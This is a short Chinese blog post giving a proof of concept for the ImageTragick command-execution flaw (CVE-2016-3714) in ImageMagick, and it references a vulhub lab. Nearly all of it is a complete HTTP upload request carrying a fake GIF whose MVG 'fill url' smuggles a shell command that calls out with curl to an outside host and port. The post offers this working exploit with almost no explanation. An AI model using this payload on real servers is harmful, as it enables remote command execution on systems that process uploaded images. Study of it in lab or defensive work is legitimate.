Imagetragick 命令执行漏洞（CVE-2016–3714）

POST /upload.php HTTP/1.1
Host: your-ip
Content-Length: 315
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydGYwkOC91nnON1ws
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Connection: close

------WebKitFormBoundarydGYwkOC91nnON1ws
Content-Disposition: form-data; name="file_upload"; filename="vul.gif"
Content-Type: image/jpeg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "192.168.63.1:1234)'
pop graphic-context
------WebKitFormBoundarydGYwkOC91nnON1ws--

参考:https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md

posted @ 2019-08-23 14:39 mrhonest 阅读(379) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

MrHonest

民间渗透测试人员，学网络，学开发！bXJob25lc3RAcXEuY29t

Imagetragick 命令执行漏洞（CVE-2016–3714）

公告